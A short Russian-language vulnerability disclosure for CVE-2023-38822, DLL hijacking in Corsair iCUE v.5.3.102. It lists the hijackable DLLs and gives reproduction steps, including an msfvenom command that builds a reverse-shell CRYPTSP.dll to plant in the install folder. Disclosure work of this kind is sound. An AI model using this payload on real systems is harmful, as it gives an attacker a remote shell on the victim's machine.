Corsair---Внедрение-DLL-CVE-2023-38822
Внедрение DLL в Corsair iCUE v.5.3.102 CVE-2023-38822
Обнаружил: Идан Малихи
Описание
Проблема в Corsair iCUE v.5.3.102 позволяет локальному злоумышленнику выполнять произвольный код через компоненты MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll и MSASN1.dll.
Шаги воспроизведения
Чтобы использовать уязвимость внедрения DLL, злоумышленнику следует выполнить следующие шаги:
- Загрузите последнюю версию iCUE.
- Установите продукт iCUE.
- Откройте папку с путём установки, например, C:\Program Files\Corsair\Corsair iCUE5 Software\
- Создайте вредоносный DLL-файл с помощью msfvenom в ОС Kali Linux:
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- Переместите DLL-файл в путь игры C:\Program Files\Corsair\Corsair iCUE5 Software\
- Запустите iCUE.exe и получите обратную оболочку.